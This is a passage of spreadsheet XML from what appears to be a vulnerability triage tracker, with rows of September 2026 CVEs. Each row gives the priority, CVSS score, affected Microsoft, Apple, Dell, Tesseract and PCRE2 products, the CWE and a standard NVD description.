        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C455" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70569</t>
        </is>
      </c>
      <c r="D455" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E455" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F455" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G455" s="5" t="inlineStr"/>
      <c r="H455" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I455" s="5" t="inlineStr"/>
      <c r="J455" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K455" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L455" s="5" t="inlineStr"/>
      <c r="M455" s="5" t="inlineStr"/>
      <c r="N455" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O455" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P455" s="5" t="inlineStr"/>
      <c r="Q455" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R455" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S455" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70569</t>
        </is>
      </c>
    </row>
    <row r="456">
      <c r="A456" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B456" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C456" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71334</t>
        </is>
      </c>
      <c r="D456" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E456" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F456" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G456" s="5" t="inlineStr"/>
      <c r="H456" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I456" s="5" t="inlineStr"/>
      <c r="J456" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K456"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456" s="5" t="inlineStr"/>
      <c r="M456" s="5" t="inlineStr"/>
      <c r="N456" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O456" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P456" s="5" t="inlineStr"/>
      <c r="Q456" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R456" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows NFS Portmapper allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S456" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71334</t>
        </is>
      </c>
    </row>
    <row r="457">
      <c r="A457" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B457" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C457" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77500</t>
        </is>
      </c>
      <c r="D457" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E457" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F457" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G457" s="5" t="inlineStr"/>
      <c r="H457" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I457" s="5" t="inlineStr"/>
      <c r="J457" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K457"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457" s="5" t="inlineStr"/>
      <c r="M457" s="5" t="inlineStr"/>
      <c r="N457" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O457" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P457" s="5" t="inlineStr"/>
      <c r="Q457" s="5" t="inlineStr">
        <is>
          <t>CWE-763</t>
        </is>
      </c>
      <c r="R457" s="5" t="inlineStr">
        <is>
          <t>Release of invalid pointer or reference in Windows Device Association Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S457" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77500</t>
        </is>
      </c>
    </row>
    <row r="458">
      <c r="A458" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B458" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C458" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80166</t>
        </is>
      </c>
      <c r="D458" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E458" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F458" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G458" s="5" t="inlineStr"/>
      <c r="H458" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I458" s="5" t="inlineStr"/>
      <c r="J458" s="5" t="inlineStr"/>
      <c r="K458" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L458" s="5" t="inlineStr"/>
      <c r="M458" s="5" t="inlineStr"/>
      <c r="N458" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O458" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P458" s="5" t="inlineStr"/>
      <c r="Q458" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R458" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Privilege Management vulnerability. An unauthenticated attacker with local access could potentially exploit this vulnerability, leading to elevation of privileges.</t>
        </is>
      </c>
      <c r="S458" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80166</t>
        </is>
      </c>
    </row>
    <row r="459">
      <c r="A459" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B459" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C459" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84497</t>
        </is>
      </c>
      <c r="D459" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E459" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F459" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G459" s="5" t="inlineStr"/>
      <c r="H459" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I459" s="5" t="inlineStr"/>
      <c r="J459" s="5" t="inlineStr"/>
      <c r="K459" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos</t>
        </is>
      </c>
      <c r="L459" s="5" t="inlineStr"/>
      <c r="M459" s="5" t="inlineStr"/>
      <c r="N459" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O459" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P459" s="5" t="inlineStr"/>
      <c r="Q459" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="R459" s="5" t="inlineStr">
        <is>
          <t>A buffer overflow was addressed with improved size validation. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27. Opening a maliciously crafted file may lead to unexpected process termination.</t>
        </is>
      </c>
      <c r="S459" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84497</t>
        </is>
      </c>
    </row>
    <row r="460">
      <c r="A460" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B460" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C460" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84505</t>
        </is>
      </c>
      <c r="D460" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E460" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F460" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G460" s="5" t="inlineStr"/>
      <c r="H460" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I460" s="5" t="inlineStr"/>
      <c r="J460" s="5" t="inlineStr"/>
      <c r="K460" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L460" s="5" t="inlineStr"/>
      <c r="M460" s="5" t="inlineStr"/>
      <c r="N460" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O460" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P460" s="5" t="inlineStr"/>
      <c r="Q460" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R460" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An app may be able to gain root privileges.</t>
        </is>
      </c>
      <c r="S460" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84505</t>
        </is>
      </c>
    </row>
    <row r="461">
      <c r="A461" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B461" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C461" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84506</t>
        </is>
      </c>
      <c r="D461" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E461" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F461" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G461" s="5" t="inlineStr"/>
      <c r="H461" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I461" s="5" t="inlineStr"/>
      <c r="J461" s="5" t="inlineStr"/>
      <c r="K461" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L461" s="5" t="inlineStr"/>
      <c r="M461" s="5" t="inlineStr"/>
      <c r="N461" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O461" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P461" s="5" t="inlineStr"/>
      <c r="Q461" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R461" s="5" t="inlineStr">
        <is>
          <t>A use after free issue was addressed with improved memory management. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. An app may be able to execute arbitrary code with kernel privileges.</t>
        </is>
      </c>
      <c r="S461" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84506</t>
        </is>
      </c>
    </row>
    <row r="462">
      <c r="A462" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B462" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C462" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84511</t>
        </is>
      </c>
      <c r="D462" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E462" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F462" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G462" s="5" t="inlineStr"/>
      <c r="H462" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I462" s="5" t="inlineStr"/>
      <c r="J462" s="5" t="inlineStr"/>
      <c r="K462" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L462" s="5" t="inlineStr"/>
      <c r="M462" s="5" t="inlineStr"/>
      <c r="N462" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O462" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P462" s="5" t="inlineStr"/>
      <c r="Q462" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R462" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. Processing a maliciously crafted asset catalog may lead to unexpected process termination.</t>
        </is>
      </c>
      <c r="S462" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84511</t>
        </is>
      </c>
    </row>
    <row r="463">
      <c r="A463" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B463" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C463" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84515</t>
        </is>
      </c>
      <c r="D463" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E463" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F463" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G463" s="5" t="inlineStr"/>
      <c r="H463" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I463" s="5" t="inlineStr"/>
      <c r="J463" s="5" t="inlineStr"/>
      <c r="K463" s="5" t="inlineStr">
        <is>
          <t>apple:macos</t>
        </is>
      </c>
      <c r="L463" s="5" t="inlineStr"/>
      <c r="M463" s="5" t="inlineStr"/>
      <c r="N463" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O463" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P463" s="5" t="inlineStr"/>
      <c r="Q463" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R463" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7. Connecting to a malicious SMB server may lead to kernel memory corruption.</t>
        </is>
      </c>
      <c r="S463" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84515</t>
        </is>
      </c>
    </row>
    <row r="464">
      <c r="A464" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B464" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C464" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84575</t>
        </is>
      </c>
      <c r="D464" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E464" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F464" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G464" s="5" t="inlineStr"/>
      <c r="H464" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I464" s="5" t="inlineStr"/>
      <c r="J464" s="5" t="inlineStr"/>
      <c r="K464" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L464" s="5" t="inlineStr"/>
      <c r="M464" s="5" t="inlineStr"/>
      <c r="N464" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O464" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P464" s="5" t="inlineStr"/>
      <c r="Q464" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R464" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. Processing a maliciously crafted file may lead to unexpected app termination.</t>
        </is>
      </c>
      <c r="S464" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84575</t>
        </is>
      </c>
    </row>
    <row r="465">
      <c r="A465" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B465" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C465" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84607</t>
        </is>
      </c>
      <c r="D465" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E465" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F465" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G465" s="5" t="inlineStr"/>
      <c r="H465" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I465" s="5" t="inlineStr"/>
      <c r="J465" s="5" t="inlineStr"/>
      <c r="K465" s="5" t="inlineStr">
        <is>
          <t>apple:ipados, apple:iphone_os, apple:macos, apple:tvos, apple:visionos, apple:watchos</t>
        </is>
      </c>
      <c r="L465" s="5" t="inlineStr"/>
      <c r="M465" s="5" t="inlineStr"/>
      <c r="N465" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O465" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P465" s="5" t="inlineStr"/>
      <c r="Q465" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R465" s="5" t="inlineStr">
        <is>
          <t>A race condition was addressed with improved state management. This issue is fixed in iOS 26.7 and iPadOS 26.7, iOS 27 and iPadOS 27, macOS Golden Gate 27, macOS Sequoia 15.8, macOS Tahoe 26.7, tvOS 27, visionOS 27, watchOS 27. A sandboxed app may be able to execute arbitrary code with kernel privileges.</t>
        </is>
      </c>
      <c r="S465" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84607</t>
        </is>
      </c>
    </row>
    <row r="466">
      <c r="A466" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B466" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C466" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85892</t>
        </is>
      </c>
      <c r="D466" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E466" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F466" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G466" s="5" t="inlineStr"/>
      <c r="H466" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I466" s="5" t="inlineStr"/>
      <c r="J466" s="5" t="inlineStr"/>
      <c r="K466" s="5" t="inlineStr"/>
      <c r="L466" s="5" t="inlineStr"/>
      <c r="M466" s="5" t="inlineStr"/>
      <c r="N466" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O466" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P466" s="5" t="inlineStr"/>
      <c r="Q466" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R466" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Microsoft Edge (Chromium-based) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S466" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85892</t>
        </is>
      </c>
    </row>
    <row r="467">
      <c r="A467" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B467" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C467" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88051</t>
        </is>
      </c>
      <c r="D467" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E467" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F467" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G467" s="5" t="inlineStr"/>
      <c r="H467" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I467" s="5" t="inlineStr"/>
      <c r="J467" s="5" t="inlineStr"/>
      <c r="K467" s="5" t="inlineStr">
        <is>
          <t>tesseract-ocr:tesseract_ocr</t>
        </is>
      </c>
      <c r="L467" s="5" t="inlineStr"/>
      <c r="M467" s="5" t="inlineStr"/>
      <c r="N467" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O467" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P467" s="5" t="inlineStr"/>
      <c r="Q467" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R467" s="5" t="inlineStr">
        <is>
          <t>Tesseract is an open source OCR engine. In version 5.5.3 and earlier, the callback form of GenericVector::read in src/ccutil/genericvector.h reads the independent int32 fields reserved and size_used_ from a .traineddata model without a cap or an invariant check. reserve(reserved) allocates the backing array, but the callback loop writes size_used_ elements. A crafted TESSDATA_INTTEMP component with version_id 4 or later can therefore set reserved to a small value and size_used_ to a large value when fontinfo_table_.read(fp, read_info) is called from src/classify/intproto.cpp, causing a heap out-of-bounds write of FontInfo structures, heap corruption, a crash, or potentially controlled corruption. No fixed release is available as of this review.</t>
        </is>
      </c>
      <c r="S467" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88051</t>
        </is>
      </c>
    </row>
    <row r="468">
      <c r="A468" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B468" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C468" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88052</t>
        </is>
      </c>
      <c r="D468" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E468" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F468" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G468" s="5" t="inlineStr"/>
      <c r="H468" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I468" s="5" t="inlineStr"/>
      <c r="J468" s="5" t="inlineStr"/>
      <c r="K468" s="5" t="inlineStr">
        <is>
          <t>tesseract-ocr:tesseract_ocr</t>
        </is>
      </c>
      <c r="L468" s="5" t="inlineStr"/>
      <c r="M468" s="5" t="inlineStr"/>
      <c r="N468" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O468" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P468" s="5" t="inlineStr"/>
      <c r="Q468" s="5" t="inlineStr">
        <is>
          <t>CWE-129, CWE-787</t>
        </is>
      </c>
      <c r="R468" s="5" t="inlineStr">
        <is>
          <t>Tesseract is an open source OCR engine. In version 5.5.3 and earlier, UNICHARSET::load_via_fgets in src/ccutil/unicharset.cpp trusts the declared unichar count as a loop bound and uses id as an unchecked index into the unichars vector. unichar_insert_backwards_compatible can leave the vector unchanged for an empty, duplicate, or already-encodable representation, causing id to become larger than unichars.size(). Subsequent set_* calls and the write to unichars[id].properties.enabled then write UNICHAR_PROPERTIES beyond the vector during initialization in both the default LSTM and legacy engines, causing heap corruption, a crash, or potentially controlled corruption. No fixed release is available as of this review.</t>
        </is>
      </c>
      <c r="S468" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88052</t>
        </is>
      </c>
    </row>
    <row r="469">
      <c r="A469" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B469" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C469" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88053</t>
        </is>
      </c>
      <c r="D469" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E469" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F469" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G469" s="5" t="inlineStr"/>
      <c r="H469" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I469" s="5" t="inlineStr"/>
      <c r="J469" s="5" t="inlineStr"/>
      <c r="K469" s="5" t="inlineStr">
        <is>
          <t>tesseract-ocr:tesseract_ocr</t>
        </is>
      </c>
      <c r="L469" s="5" t="inlineStr"/>
      <c r="M469" s="5" t="inlineStr"/>
      <c r="N469" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O469" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="P469" s="5" t="inlineStr"/>
      <c r="Q469" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R469" s="5" t="inlineStr">
        <is>
          <t>Tesseract is an open source OCR engine. In version 5.5.3 and earlier, Classify::ReadIntTemplates in src/classify/intproto.cpp reads NumClassPruners, NumClasses, and NumProtoSets from the TESSDATA_INTTEMP component of a crafted .traineddata file and uses those values as loop bounds without validating them against MAX_NUM_CLASS_PRUNERS, MAX_NUM_CLASSES, and MAX_NUM_PROTO_SETS. The loops store heap pointers into fixed-capacity ClassPruners and ProtoSets arrays in INT_TEMPLATES_STRUCT and INT_CLASS_STRUCT, so an oversized count causes heap out-of-bounds pointer writes during legacy-classifier initialization before OCR begins, resulting in heap corruption, a crash, or potentially controlled corruption. No fixed release is available as of this review.</t>
        </is>
      </c>
      <c r="S469" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88053</t>
        </is>
      </c>
    </row>
    <row r="470">
      <c r="A470" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B470" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C470" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89161</t>
        </is>
      </c>
      <c r="D470" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E470" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F470" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G470" s="5" t="inlineStr"/>
      <c r="H470" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I470" s="5" t="inlineStr"/>
      <c r="J470" s="5" t="inlineStr"/>
      <c r="K470" s="5" t="inlineStr">
        <is>
          <t>pcre:pcre2</t>
        </is>
      </c>
      <c r="L470" s="5" t="inlineStr"/>
      <c r="M470" s="5" t="inlineStr"/>
      <c r="N470" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O470" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P470" s="5" t="inlineStr"/>
      <c r="Q470" s="5" t="inlineStr">
        <is>
          <t>CWE-590</t>
        </is>
      </c>
      <c r="R470" s="5" t="inlineStr">
        <is>
          <t>In PCRE2 before 10.48, pcre2_jit_match mishandles a previously copied subject being passed in as a context. An incorrect free operation can occur.</t>
        </is>
      </c>
      <c r="S470" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89161</t>
        </is>
      </c>
    </row>
    <row r="471">
      <c r="A471" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B471" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C471" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89789</t>
        </is>
      </c>
      <c r="D471" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E471" s="5" t="inlineStr">
        <is>
